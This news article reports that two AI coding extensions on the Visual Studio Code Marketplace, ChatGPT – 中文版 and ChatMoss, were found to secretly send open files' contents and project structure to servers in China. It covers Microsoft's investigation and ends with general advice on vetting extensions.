Table of Contents
You use extensions to enhance your development experience on Visual Studio Code, but are you really aware of what’s happening in the background? Imagine your code being sent to remote servers without your knowledge. Intrigued? Discover how the ChatGPT – 中文版 and ChatMoss extensions could compromise your work.
The 3 must-know facts
The ChatGPT – 中文版 and ChatMoss extensions, available on the Visual Studio Code Marketplace, are known for providing code suggestions and completions. However, Koi Security revealed that these tools discreetly send the content of open files to servers located in China. The user, unknowingly, sees their data exfiltrated in the background.
Researchers discovered that as soon as a file is opened with these active extensions, its content is encoded in Base64 and transmitted. This process, carried out without alert or consent request, jeopardizes the confidentiality of user data.
ChatGPT – 中文版 and ChatMoss do not just function as simple code editing tools. The extensions are capable of transmitting commands that trigger the sending of multiple files from the same project. The data sent includes not only the content of the files but also their location, allowing the entire structure of a Visual Studio Code project to be reconstructed.
According to BleepingComputer, the integration of analytics SDKs in these extensions allows for the collection of information on user activity, such as files viewed or modified. The exfiltration process continues as long as the extensions remain active, making detection difficult without a thorough technical inspection.
Microsoft has confirmed being aware of Koi Security’s findings and is currently conducting an investigation. Despite this, the incriminated extensions remain available on the Visual Studio Code Marketplace, raising questions about the platform’s extension verification mechanisms.
For developers, this situation highlights the importance of verifying the security of the tools used in their work environment. It is imperative to be vigilant about downloaded extensions and to stay informed about platform security practices.
Visual Studio Code, launched by Microsoft in 2015, quickly became one of the most popular code editors thanks to its flexibility and wide range of extensions. Its marketplace offers thousands of extensions that enhance the developer experience, ranging from productivity tools to specific language integrations.
With the rise of artificial intelligence, AI-based extensions like ChatGPT – 中文版 and ChatMoss have gained popularity by offering advanced code completion features. However, this case underscores the need for developers to be mindful of the security implications of the tools they choose to integrate into their workflows.
Source: